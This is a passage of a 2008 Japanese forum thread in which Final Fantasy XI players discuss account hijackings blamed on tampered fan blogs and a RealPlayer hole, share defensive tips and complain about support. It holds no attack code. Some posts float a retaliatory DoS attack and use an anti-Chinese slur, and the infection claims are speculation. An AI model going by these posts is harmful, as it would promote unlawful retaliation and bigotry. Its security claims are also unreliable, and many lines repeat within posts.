倉庫めぐりまでされてるとか。
なんというやるせなさw
フレが倉庫にtellで「GM呼んだ」的なことを言ったら
「Please」とかえってきたそうな。
返事するんだな・・・・
274 :既にその名前は使われています:2008/03/24(月) 23:48:54.82 ID:We8pVkNe
275 :既にその名前は使われています:2008/03/24(月) 23:51:06.74 ID:rpE40Jdl
そういえば、前ここでハックされたって報告来てた人が、2垢でGMコール呼びながら
のっとられたキャラに英語でその垢返せって言ったら、これは貰っただか買った垢だって
英語(ピンイン混じってたきもするけど)で言い返してきたのもいたらしいですね
のっとられたキャラに英語でその垢返せって言ったら、これは貰っただか買った垢だって
英語(ピンイン混じってたきもするけど)で言い返してきたのもいたらしいですね
276 :既にその名前は使われています:2008/03/24(月) 23:53:57.19 ID:1ggkpLWR
>>274
もはやここ一週間で多数のキャラからアイテム9割以上(レアEX除く)を
受け取ったってだけで業者認定して垢禁&アイテム戻しでいいだろと思う。
一人からでも9割以上のアイテム移動はレアだからそれでひっかけられねーのかなぁ。
もはやここ一週間で多数のキャラからアイテム9割以上(レアEX除く)を
受け取ったってだけで業者認定して垢禁&アイテム戻しでいいだろと思う。
一人からでも9割以上のアイテム移動はレアだからそれでひっかけられねーのかなぁ。
277 :既にその名前は使われています:2008/03/24(月) 23:56:33.23 ID:u0FcALPC
解約→FFアンインスコ
これが最大の防衛策に思えてきた
他のゲームならハックされたら公式HPでパスワード忘れた
→新パスワードがメールで送られてくる
→自分でログインしてINしてる業者落とす
→公式HPでパス再発行、ここでメール受け取らなきゃ安全
OS再インスコ
これ24時間できたりするのよ
ハックされた人は面倒でもちゃんと警察に届けてね
届けないと□は「あなたが業者にパスとID教えた」
とみなすから
これが最大の防衛策に思えてきた
他のゲームならハックされたら公式HPでパスワード忘れた
→新パスワードがメールで送られてくる
→自分でログインしてINしてる業者落とす
→公式HPでパス再発行、ここでメール受け取らなきゃ安全
OS再インスコ
これ24時間できたりするのよ
ハックされた人は面倒でもちゃんと警察に届けてね
届けないと□は「あなたが業者にパスとID教えた」
とみなすから
278 :既にその名前は使われています:2008/03/24(月) 23:57:04.89 ID:DyD4MS3I
久しぶりにログインしたらキャラが裸だったとか
今後続きそうだな
今後続きそうだな
279 :既にその名前は使われています:2008/03/25(火) 00:00:11.53 ID:8jcNID1A
今月見つかったRealPlayerのActiveXコントロールの穴は
11.0.2でふさがったらしい
確証はないけど、今回の垢ハック騒動はこの穴も使われているかも
最新のRealPlayer 11.0.2でも1月に見つかった穴は残ったままみたいだから
アンインストール推奨だけどな
11.0.2でふさがったらしい
確証はないけど、今回の垢ハック騒動はこの穴も使われているかも
最新のRealPlayer 11.0.2でも1月に見つかった穴は残ったままみたいだから
アンインストール推奨だけどな
280 :既にその名前は使われています:2008/03/25(火) 00:01:19.87 ID:mx3cOLzk
281 :既にその名前は使われています:2008/03/25(火) 00:05:41.63 ID:N6twjFNK
282 :既にその名前は使われています:2008/03/25(火) 00:05:51.11 ID:r19OMXfd
今現在動いてる厨蚊がいるなら天安門事件なりなんなり、
そのあたりの言葉でログ埋め尽くしてやりたい気分だな。
その手の言葉、詳しくないからあまり知らないが・・・。
そのあたりの言葉でログ埋め尽くしてやりたい気分だな。
その手の言葉、詳しくないからあまり知らないが・・・。
283 :既にその名前は使われています:2008/03/25(火) 00:05:58.27 ID:GeAvoS1Q
ブログも一切見て無いが、やっぱり怖いよな・・・
本当はとられてて、業者の処理が間に合わなくて、今は問題ないけど
そのうちとられたりするんじゃ無いかと思うと怖い・・・
本当はとられてて、業者の処理が間に合わなくて、今は問題ないけど
そのうちとられたりするんじゃ無いかと思うと怖い・・・
284 :既にその名前は使われています:2008/03/25(火) 00:07:24.68 ID:WD+HwGs7
>>283
今すぐカスペルオンラインスキャナするんだ!
今すぐカスペルオンラインスキャナするんだ!
285 :既にその名前は使われています:2008/03/25(火) 00:08:09.82 ID:sGs0zFvT
バハ板も現在進行形でハック実況されてるなあ。
今回のメンテでなんとかして欲しいよ。
今回のメンテでなんとかして欲しいよ。
286 :既にその名前は使われています:2008/03/25(火) 00:08:16.82 ID:GeAvoS1Q
287 :既にその名前は使われています:2008/03/25(火) 00:10:11.47 ID:j2GSQhJ6
白門でEでPT希望出してるKeycle
288 :既にその名前は使われています:2008/03/25(火) 00:10:28.66 ID:8nsrrYgI
PS2&箱ユーザーだけど、ここみて背筋が寒くなったので、POLにインする際に
メンバーパスワードを入れるようにしたよ。
メンバーパスワードを入れるようにしたよ。
289 :既にその名前は使われています:2008/03/25(火) 00:10:30.53 ID:WD+HwGs7
>>286
スキャナでトロイ出無いてことは、今は取られてないんじゃない?
スキャナでトロイ出無いてことは、今は取られてないんじゃない?
290 :268:2008/03/25(火) 00:10:35.61 ID:HuadLiyJ
>>274
窓口くらいは対処してほしいですね。
何もできずに指をくわえてフレからの情報をきいてるだけってのは
ほんとやるせないです。
私が感染したと思われる状況を書いておくので
心当たりのある方は対策をとるほうがいいかもしれません。
ペコろぐ。を先週末も見ていました。(週に数回見てる)
昨日は正常にログイン。
今日、携帯でこのスレを知り、
帰ってウィルスチェックしてみようと思っていた矢先にこれです。
※ペコろぐ。様に害意はありません。
うちのサルLSはあそこなしではありえないくらい頼ってましたので。
窓口くらいは対処してほしいですね。
何もできずに指をくわえてフレからの情報をきいてるだけってのは
ほんとやるせないです。
私が感染したと思われる状況を書いておくので
心当たりのある方は対策をとるほうがいいかもしれません。
ペコろぐ。を先週末も見ていました。(週に数回見てる)
昨日は正常にログイン。
今日、携帯でこのスレを知り、
帰ってウィルスチェックしてみようと思っていた矢先にこれです。
※ペコろぐ。様に害意はありません。
うちのサルLSはあそこなしではありえないくらい頼ってましたので。
291 :既にその名前は使われています:2008/03/25(火) 00:11:18.51 ID:g7f8T3fx
Realpleyerの穴ってリアルプレイヤインスコしてなかったら無関係?
俺最近PCかい直してRPそのまま入れてないんだけど。
俺最近PCかい直してRPそのまま入れてないんだけど。
292 :既にその名前は使われています:2008/03/25(火) 00:12:32.76 ID:ZVcNVdfz
専ブラで見たらレス数少ないクソスレ乱立しまくりだな
ネ実は24時間あげあげあげえええ
ネ実は24時間あげあげあげえええ
293 :既にその名前は使われています:2008/03/25(火) 00:12:33.76 ID:GeAvoS1Q
294 :268:2008/03/25(火) 00:14:14.08 ID:HuadLiyJ
295 :既にその名前は使われています:2008/03/25(火) 00:15:12.22 ID:WD+HwGs7
>>293
今日このスレ初めて見て、怖くなったからPG2入れた。
FC2系のブログは当分見ないことにした。
無関係なHPまで改竄されたらどうしょうもないが、少しでも可能性減らすように
自衛するしかないよね・・・。
今日このスレ初めて見て、怖くなったからPG2入れた。
FC2系のブログは当分見ないことにした。
無関係なHPまで改竄されたらどうしょうもないが、少しでも可能性減らすように
自衛するしかないよね・・・。
296 :既にその名前は使われています:2008/03/25(火) 00:17:52.26 ID:czdY66qa
297 :既にその名前は使われています:2008/03/25(火) 00:18:43.66 ID:jhdd7oxY
バハ鯖で2日連続垢ハックwwwwww
被害者鯖スレに降臨中
被害者鯖スレに降臨中
298 :既にその名前は使われています:2008/03/25(火) 00:23:29.00 ID:nQ1aeD7W
取り合えずパスは用心して変えておいた
299 :既にその名前は使われています:2008/03/25(火) 00:24:20.68 ID:gAnYPalN
GMも垢ハック専用窓口を24時間体制で作れ!
自キャラがハックされてアイテムトレードしながらうろうろしているのを2時間も3時間もみてるだけってありえんだろ?!
サポセンの電話は昼間だけだし・・・・・・
自キャラがハックされてアイテムトレードしながらうろうろしているのを2時間も3時間もみてるだけってありえんだろ?!
サポセンの電話は昼間だけだし・・・・・・
300 :既にその名前は使われています:2008/03/25(火) 00:38:30.70 ID:ZVcNVdfz
俺ハックされたら鯖スレにキャラネーム晒してなんとかして助けてもらおうとするだろうなw
だって5年も育てたキャラなんだぜ・・・いきなり何もかも失うとか超嫌だ。
ホント自分必死すぎでキモイ。
だって5年も育てたキャラなんだぜ・・・いきなり何もかも失うとか超嫌だ。
ホント自分必死すぎでキモイ。
301 :既にその名前は使われています:2008/03/25(火) 01:00:12.55 ID:omlW/ixG
302 :既にその名前は使われています:2008/03/25(火) 01:03:42.77 ID:wU4wL3FZ
POLシステムを改良するか、サポセン24時間をすぐやれ!!
303 :既にその名前は使われています:2008/03/25(火) 01:11:36.40 ID:f5GA3rVo
バハ鯖スレみてきたよ。
昨日といい今日といい、サポセン動いてない時間狙ってるんだろうなぁ。
同じ鯖の人がああいう状態になったら力になってあげようと思うよ、ほんとまじで。。
これからどんどんハックされる人でてくるんだろうなぁ、
有名ブログが改ざんされたわけだし。
まじで、業者ゆるせん
昨日といい今日といい、サポセン動いてない時間狙ってるんだろうなぁ。
同じ鯖の人がああいう状態になったら力になってあげようと思うよ、ほんとまじで。。
これからどんどんハックされる人でてくるんだろうなぁ、
有名ブログが改ざんされたわけだし。
まじで、業者ゆるせん
304 :既にその名前は使われています:2008/03/25(火) 01:17:32.63 ID:vFPHu9Hl
・サポセンの24時間サポート
・指定されたISP(IP)からのみログイン可
・パスワードなどのアカウント情報変更時に秘密の質問
・アカウント情報変更後にユーザーにメールで変更のお知らせ
・ログインメッセージ・公式サイトのトップページで注意喚起
・LSCへのログインをPOLは別のID・パスワードに変更
このくらいはやってもらわんと・・・てかサポセンの24時間サポート以外は
すぐ出来ると思うんだがな。
それにしてもLSCなんてセキュリティ意識のある人間が作ったとは思えない仕様だな
・・・この辺NAに突っ込まれてたしスンヂ馬鹿すぎるだろ。
・指定されたISP(IP)からのみログイン可
・パスワードなどのアカウント情報変更時に秘密の質問
・アカウント情報変更後にユーザーにメールで変更のお知らせ
・ログインメッセージ・公式サイトのトップページで注意喚起
・LSCへのログインをPOLは別のID・パスワードに変更
このくらいはやってもらわんと・・・てかサポセンの24時間サポート以外は
すぐ出来ると思うんだがな。
それにしてもLSCなんてセキュリティ意識のある人間が作ったとは思えない仕様だな
・・・この辺NAに突っ込まれてたしスンヂ馬鹿すぎるだろ。
305 :既にその名前は使われています:2008/03/25(火) 01:18:08.85 ID:rMVWg75a
関わると危険だと言う意識が広まってしまうと、買い手が激減するだろうし
業者が自分で自分の首を絞めてるようにも思えるが・・・
こんなことが起きても、まだ買う奴なんているのかねぇ。
業者が自分で自分の首を絞めてるようにも思えるが・・・
こんなことが起きても、まだ買う奴なんているのかねぇ。
306 :既にその名前は使われています:2008/03/25(火) 01:23:18.89 ID:9f0lVnnD
PS2だけど、PCでLSコミュニティとか使ってたし
怖いからPOLのパスワード変えといたぜー。
これでもうLSコミュニティとか二度と使わなければ
一安心かな?まあでも定期的にパス変えよっと。
おそろしやおそろしや。
怖いからPOLのパスワード変えといたぜー。
これでもうLSコミュニティとか二度と使わなければ
一安心かな?まあでも定期的にパス変えよっと。
おそろしやおそろしや。
307 :既にその名前は使われています:2008/03/25(火) 01:25:00.75 ID:jhJ+BovV
308 :既にその名前は使われています:2008/03/25(火) 01:25:11.33 ID:elGAe1vY
ここでの報告見てると
バハ鯖の人が多いのかなとか関係ないことを考えてしまうバハ民
前、救えネの洋ゲーやってたときはGMコールとか24時間対応で
返事から行動まですぐ対処してくれてたんだけどなー
もう、そこまで力入れてないってことなのか・・・
垢ハックなんてソフト開発側じゃある程度までしか出来ないだろうし
メンテがそれの対策ならいいんだけどね
個人のデータ管理とOS側に頼るんだろうなー
バハ鯖の人が多いのかなとか関係ないことを考えてしまうバハ民
前、救えネの洋ゲーやってたときはGMコールとか24時間対応で
返事から行動まですぐ対処してくれてたんだけどなー
もう、そこまで力入れてないってことなのか・・・
垢ハックなんてソフト開発側じゃある程度までしか出来ないだろうし
メンテがそれの対策ならいいんだけどね
個人のデータ管理とOS側に頼るんだろうなー
309 :既にその名前は使われています:2008/03/25(火) 01:25:25.04 ID:pm+l6zsS
ここが■の岐路だな。
きっちりとした対応や保証を打ち出せればアップ内容がクソとか目を瞑ってもいいぐらい評価されるはず。
が、今までの上から目線での適当な対応を続けるようなら遠からずFFは終るだろう。
次世代オンゲにも人が集まるわけは無い。
業者問題はネトゲやるならこれからもずっと付き纏うだろうからな…。
きっちりとした対応や保証を打ち出せればアップ内容がクソとか目を瞑ってもいいぐらい評価されるはず。
が、今までの上から目線での適当な対応を続けるようなら遠からずFFは終るだろう。
次世代オンゲにも人が集まるわけは無い。
業者問題はネトゲやるならこれからもずっと付き纏うだろうからな…。
310 :既にその名前は使われています:2008/03/25(火) 01:27:04.26 ID:7ZgQEQ9q
赤ハックされてないが俺もバハ鯖民だ
まぁ俺はPS2だから大丈夫だとは思うけどな…
まぁ俺はPS2だから大丈夫だとは思うけどな…
311 :280:2008/03/25(火) 01:31:21.14 ID:mx3cOLzk
280です。まだGMきません。
このシステムもいい加減にしてほしいですね。
メンテまで@30分。
こないで終わっちゃうかなぁ。
くやしいなぁ
このシステムもいい加減にしてほしいですね。
メンテまで@30分。
こないで終わっちゃうかなぁ。
くやしいなぁ
312 :既にその名前は使われています:2008/03/25(火) 01:32:16.79 ID:9f0lVnnD
>>311
がんばれ!泣き寝入りだけはしてほしくない!
がんばれ!泣き寝入りだけはしてほしくない!
313 :既にその名前は使われています:2008/03/25(火) 01:35:42.94 ID:yV1jINTG
ソースコード書き込まれたらアウトならwikiとか危ないと思うんだけど違うの?
314 :既にその名前は使われています:2008/03/25(火) 01:38:12.64 ID:4E2nw6wM
>>313
あってる
あってる
315 :既にその名前は使われています:2008/03/25(火) 01:38:48.39 ID:CPKgTWTl
FFのWikiでリンク先を罠サイトに書き換えられたことはあった。
今はリンクたどって飛ぶときは警告出るようになってたはず。
ジョブ別のWikiはわからん…
今はリンクたどって飛ぶときは警告出るようになってたはず。
ジョブ別のWikiはわからん…
316 :既にその名前は使われています:2008/03/25(火) 01:40:05.02 ID:slcFTapg
wikiを見るだけで感染
ということはまったくないのだろうか?
ということはまったくないのだろうか?
317 :既にその名前は使われています:2008/03/25(火) 01:40:25.33 ID:9ZDfFG9H
サービスは365日24時間なのに、サポセンはお休み有。
ふしぎ
ふしぎ
318 :既にその名前は使われています:2008/03/25(火) 01:41:28.99 ID:vHIgAKgq
フレのフレがさっきハックされた。
さっきまでGMと交渉中だったらしいが、身近に起こるとまじで怖いな、てかむかつくage
さっきまでGMと交渉中だったらしいが、身近に起こるとまじで怖いな、てかむかつくage
319 :既にその名前は使われています:2008/03/25(火) 01:44:02.30 ID:hs/jxftM
頭おかしいよ業者
逆にDoS攻撃出来ないかな
逆にDoS攻撃出来ないかな
320 :既にその名前は使われています:2008/03/25(火) 01:46:17.19 ID:7Ffb97n9
321 :既にその名前は使われています:2008/03/25(火) 01:46:49.14 ID:6E0RlrkX
今回被害にあって警察いって
電子データ?が被害にあったと認められ、被害届け受理されて、何らかの対処まで行くとするならば。
■がこれまで主張していた、ゲームデータはスクエアに所有権が帰属するって一方的に主張してるのがくつがえるかもな
たとえ、ゲーム会社が契約で書いて承諾させたとしても、その文章が違憲となれば、データはユーザー側のものとなって
このくそのろい対応や、セキュリティや管理に注意を払わせることにつながらねーかな?
金もらってサービスを受けてるのに、ろくなサポートもしねー。
何かをいっても、華麗にスルー、あまりにも顧客を馬鹿にしすぎてきた■にそろそろ鉄槌をくだすべきじゃねーか?
今回だけは明日はわが身だ
電子データ?が被害にあったと認められ、被害届け受理されて、何らかの対処まで行くとするならば。
■がこれまで主張していた、ゲームデータはスクエアに所有権が帰属するって一方的に主張してるのがくつがえるかもな
たとえ、ゲーム会社が契約で書いて承諾させたとしても、その文章が違憲となれば、データはユーザー側のものとなって
このくそのろい対応や、セキュリティや管理に注意を払わせることにつながらねーかな?
金もらってサービスを受けてるのに、ろくなサポートもしねー。
何かをいっても、華麗にスルー、あまりにも顧客を馬鹿にしすぎてきた■にそろそろ鉄槌をくだすべきじゃねーか?
今回だけは明日はわが身だ
322 :既にその名前は使われています:2008/03/25(火) 01:47:42.14 ID:ysJWQJk7
>>320
同じ人が常時対応してるワケじゃねーだろw
同じ人が常時対応してるワケじゃねーだろw
323 :既にその名前は使われています:2008/03/25(火) 01:48:27.67 ID:9ZDfFG9H
今回のは結構被害者多そうな。
324 :既にその名前は使われています:2008/03/25(火) 01:48:48.23 ID:9f0lVnnD
325 :既にその名前は使われています:2008/03/25(火) 01:52:33.09 ID:xwSNSLwB
業者はbotネット使って、DDoS攻撃してくるんじゃ?
それはさておき、パスワードやめてUSBトークンとか使った鍵認証とかにすればいいのにな。
PS2やPS2にもUSBつなげそうだし。追加数千円(導入時のみ)でだせば結構売れるかも?
それはさておき、パスワードやめてUSBトークンとか使った鍵認証とかにすればいいのにな。
PS2やPS2にもUSBつなげそうだし。追加数千円(導入時のみ)でだせば結構売れるかも?
326 :既にその名前は使われています:2008/03/25(火) 01:52:57.22 ID:4E2nw6wM
>>321
セキュリティは本人のせいだろうに
鯖ハックされたんなら■eの責任だろうけど
つか、警察は動くよ。でも電子データがどうのこうのは関係なく、トロイ配布とかそれに準ずる行為のほうでだけど
■eのGMの対応は、あれ以外やりようがないだろwこないだ、他人にID売ってから
サポセン電話してキャラ取り返したアフォが出たからな、本人と確認出来ても危ないってこった
セキュリティは本人のせいだろうに
鯖ハックされたんなら■eの責任だろうけど
つか、警察は動くよ。でも電子データがどうのこうのは関係なく、トロイ配布とかそれに準ずる行為のほうでだけど
■eのGMの対応は、あれ以外やりようがないだろwこないだ、他人にID売ってから
サポセン電話してキャラ取り返したアフォが出たからな、本人と確認出来ても危ないってこった
327 :既にその名前は使われています:2008/03/25(火) 01:53:31.73 ID:xwSNSLwB
>>325
PS2やPS3だorz
PS2やPS3だorz
328 :既にその名前は使われています:2008/03/25(火) 01:53:38.76 ID:2UE3q0B9
fc2の一件から被害の報告が増えたなー
ここに来てる報告だけでもこれだけあるんだから、相当被害が拡大してると思うんだが。
せめて公式にアナウンスして欲しいもんだ。
ネ実で頑張って啓蒙しても、■が誇る数十万ユーザーに情報が行き渡るわけじゃないんだからさ
ここに来てる報告だけでもこれだけあるんだから、相当被害が拡大してると思うんだが。
せめて公式にアナウンスして欲しいもんだ。
ネ実で頑張って啓蒙しても、■が誇る数十万ユーザーに情報が行き渡るわけじゃないんだからさ
329 :既にその名前は使われています:2008/03/25(火) 01:54:44.80 ID:rNeX04xY
アカウントハックされてますってすぐにこないGMも糞だな。
330 :既にその名前は使われています:2008/03/25(火) 01:57:26.83 ID:wc2s+Fxx
だとしても■側が出来るレベル、やって当然のレベルの対応を怠ってるってのは何度も言われてきてるんだよな。
暗号化ファイルをそのまま別のPOLクライアントに入れたらそのまま動くとかさ。
正直RMT利用者への対応とか変えないとダメだろ。現状RMTでBANされてもキャラ名出るわけでもないんだし、
「RMTやってた」って罪でBANされた事を前面に出さないと業者はもっと悪質な手に出る可能性もある。
暗号化ファイルをそのまま別のPOLクライアントに入れたらそのまま動くとかさ。
正直RMT利用者への対応とか変えないとダメだろ。現状RMTでBANされてもキャラ名出るわけでもないんだし、
「RMTやってた」って罪でBANされた事を前面に出さないと業者はもっと悪質な手に出る可能性もある。
331 :既にその名前は使われています:2008/03/25(火) 01:57:38.83 ID:CPKgTWTl
GMのまにゅあるwでアカハックの優先順位がまだ低いんじゃない?
地形ハマリとかは何件待ちでも5分くらいで来る。優先順位が高く設定されてて
すぐに対応するように決められると思う。
垢ハックは通常のコールと同じ優先順位の対応なんだろう。
地形ハマリとかは何件待ちでも5分くらいで来る。優先順位が高く設定されてて
すぐに対応するように決められると思う。
垢ハックは通常のコールと同じ優先順位の対応なんだろう。
332 :既にその名前は使われています:2008/03/25(火) 01:57:43.45 ID:slcFTapg
カスペでスキャンしたとき
ロックされてるって出る部分は安全なの?
ロックされてるって出る部分は安全なの?
333 :既にその名前は使われています:2008/03/25(火) 02:01:35.72 ID:zAORBuM/
住んでる地域や使用プロバイダやIPの情報を自分で登録して、そこ以外から
接続あっても繋ぐことができない、みたいなシステムってスクエニ側で作れないの?
ネカフェとか友達の家で繋ぎたいって人だけ制限をボタン1つで解除できるようなシステム
接続あっても繋ぐことができない、みたいなシステムってスクエニ側で作れないの?
ネカフェとか友達の家で繋ぎたいって人だけ制限をボタン1つで解除できるようなシステム
334 :280:2008/03/25(火) 02:01:51.03 ID:mx3cOLzk
くそ!メンテ時間までに来なかった。
直前までハック野郎がフレの倉庫でアクセスしてて、なにもできないのがすげームカついた!
明日も朝からGM呼んでみるか。
直前までハック野郎がフレの倉庫でアクセスしてて、なにもできないのがすげームカついた!
明日も朝からGM呼んでみるか。
335 :既にその名前は使われています:2008/03/25(火) 02:02:57.84 ID:9f0lVnnD
>>334
がんばって!!
がんばって!!
336 :既にその名前は使われています:2008/03/25(火) 02:03:03.50 ID:9ZDfFG9H
このメンテは何かの対策なのか、それとも単なる不具合の修正なのか・・・
337 :既にその名前は使われています:2008/03/25(火) 02:04:57.38 ID:9HKbKXJk
対策ならPOLもメンテ入るだろうよ
今月いっぱいシカトするなら俺もちょっと引退考えるな
ついていけない
今月いっぱいシカトするなら俺もちょっと引退考えるな
ついていけない
338 :既にその名前は使われています:2008/03/25(火) 02:05:52.80 ID:QVf8SjqO
パスワード2つ発行すればいいんじゃないか?
ひとつは、いままでのIDとPASS。
もうひとつは非常用のIDとPASS。これはPOL上では保存せず保管。
緊急時には非常用のをPOL上でソフトウェア入力して使用。
あんまいみないかねー。
ひとつは、いままでのIDとPASS。
もうひとつは非常用のIDとPASS。これはPOL上では保存せず保管。
緊急時には非常用のをPOL上でソフトウェア入力して使用。
あんまいみないかねー。
339 :既にその名前は使われています:2008/03/25(火) 02:07:22.07 ID:rvQA3x19
新スレ作るしかないか。■が嫌でも動かなきゃいけないくらい、いろんなとこに貼り付けるしかないな。
340 :既にその名前は使われています:2008/03/25(火) 02:10:11.67 ID:WT1MZrdK
尻鯖だけど、知り合いから聞いただけでも今日垢ハックされたの3名
多すぎないか?
多すぎないか?
341 :既にその名前は使われています:2008/03/25(火) 02:10:34.22 ID:6E0RlrkX
この2,3日はまじで「おまえらー」とかネタスレ作って遊んでる場合じゃねーよ
まじで
まじで
342 :既にその名前は使われています:2008/03/25(火) 02:11:08.82 ID:wU4wL3FZ
343 :既にその名前は使われています:2008/03/25(火) 02:12:17.77 ID:hs/jxftM
支那が喋れない様な日本語の音声認証をですね
344 :既にその名前は使われています:2008/03/25(火) 02:12:41.06 ID:9ZDfFG9H
345 :既にその名前は使われています:2008/03/25(火) 02:13:41.52 ID:rvQA3x19
やばすぎだろ。ここまで、堂々とやられてるのに、何も対応しないとは、■倒産してもいいわ。
346 :既にその名前は使われています:2008/03/25(火) 02:14:18.85 ID:QVf8SjqO
>>341
【RMT業者】おまえら垢ハック大流行なのにFFか【ブログ改竄】
【RMT業者】おまえら垢ハック大流行なのにFFか【ブログ改竄】
347 :既にその名前は使われています:2008/03/25(火) 02:14:50.98 ID:dKvvhOTu
348 :既にその名前は使われています:2008/03/25(火) 02:15:38.30 ID:9ZDfFG9H
大問題じゃないか
349 :既にその名前は使われています:2008/03/25(火) 02:15:44.70 ID:WT1MZrdK
身近な人間がやられるまでは対岸の火事と思えるが
実際に知り合いがやられると、理不尽な相手に対する怒りと
盗まれたキャラを目の前で見ながら何も出来ない無力感に絶望する
実際に知り合いがやられると、理不尽な相手に対する怒りと
盗まれたキャラを目の前で見ながら何も出来ない無力感に絶望する
350 :既にその名前は使われています:2008/03/25(火) 02:15:54.43 ID:/5SLOYFD
もうゲーム内での迷惑行為ではなくてリアルに犯罪だもんなあ。
犯罪で金稼ぎ。
犯罪で金稼ぎ。
351 :既にその名前は使われています:2008/03/25(火) 02:15:59.57 ID:b1jIPTS8
そんなファッキングされてんだwwwwwwwwwwwwww
352 :既にその名前は使われています:2008/03/25(火) 02:17:16.72 ID:auLaoDR9
競売のサイトの奴とかも怖いぜo(`д´o)
353 :既にその名前は使われています:2008/03/25(火) 02:17:26.74 ID:2UE3q0B9
よくフリーメールとかにある「パスワードを忘れて再発行する時のための秘密の質問」
みたいのはどうだろう。
ペットの名前なり親の誕生日なりを設定して、たとえ外部から不正アクセスされてパスを
変えられても、ネットからそれでパスの再発行かアカウントの凍結ができるようにするとか。
今一番問題なのは、パスの再発行が時間の限られてるサポセンでしかできないって点だしね。
それさえ改善できれば少しはこっちの気苦労というか焦燥も無くなるんだけどな
みたいのはどうだろう。
ペットの名前なり親の誕生日なりを設定して、たとえ外部から不正アクセスされてパスを
変えられても、ネットからそれでパスの再発行かアカウントの凍結ができるようにするとか。
今一番問題なのは、パスの再発行が時間の限られてるサポセンでしかできないって点だしね。
それさえ改善できれば少しはこっちの気苦労というか焦燥も無くなるんだけどな
354 :既にその名前は使われています:2008/03/25(火) 02:18:48.15 ID:vFPHu9Hl
GM>垢ハック被害のコール多くて頭おかしくなって死ぬ
355 :既にその名前は使われています:2008/03/25(火) 02:18:51.29 ID:rvQA3x19
すれたてしただけで、罠にはひっかからないよな・・・?
356 :既にその名前は使われています:2008/03/25(火) 02:21:29.75 ID:n1eE+/LN
サポセン体制やらさらなる対策を行うとすれば
その分のコストをどこから出すのかが問題かねぇ
月の課金額をリネ2並みにするなりしないと
株式会社としては利益を削る方向には動けないだろうし
その分のコストをどこから出すのかが問題かねぇ
月の課金額をリネ2並みにするなりしないと
株式会社としては利益を削る方向には動けないだろうし
357 :既にその名前は使われています:2008/03/25(火) 02:22:56.51 ID:9f0lVnnD
358 :既にその名前は使われています:2008/03/25(火) 02:24:08.74 ID:9f0lVnnD
359 :既にその名前は使われています:2008/03/25(火) 02:24:24.31 ID:hpBmpOa9
アカハックされたときFFからGMコールして6時間またされたなぁ
夜間だとPOLから呼んだほうがはやいかも?
夜間だとPOLから呼んだほうがはやいかも?
360 :既にその名前は使われています:2008/03/25(火) 02:24:39.85 ID:czdY66qa
>>357
クラックされてログが消えたことがあったかと
クラックされてログが消えたことがあったかと
361 :既にその名前は使われています:2008/03/25(火) 02:25:16.82 ID:58aTjjEl
>>347
マジっすかw
有名FC2ブログ改竄の件で被害者がめちゃ増えたんだろうな。
FC2ブログが危ないってこのスレ追いかけてなきゃ分からない事実だったし。
信頼の置けるブログがハックされて罠仕掛けられてるなんて普通は思わないよ。
スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
既に信頼は地に落ちてるよ。
次世代MMO立ち上げても誰も付いて来ないんじゃないの?w
マジっすかw
有名FC2ブログ改竄の件で被害者がめちゃ増えたんだろうな。
FC2ブログが危ないってこのスレ追いかけてなきゃ分からない事実だったし。
信頼の置けるブログがハックされて罠仕掛けられてるなんて普通は思わないよ。
スクエニもシカトするのいい加減限界なはずなんだが、よく放置できるな。
既に信頼は地に落ちてるよ。
次世代MMO立ち上げても誰も付いて来ないんじゃないの?w
362 :既にその名前は使われています:2008/03/25(火) 02:25:20.96 ID:9f0lVnnD
>>360
そうなのか!こわいなあ〜。
そうなのか!こわいなあ〜。
363 :既にその名前は使われています:2008/03/25(火) 02:26:15.59 ID:9HKbKXJk
364 :既にその名前は使われています: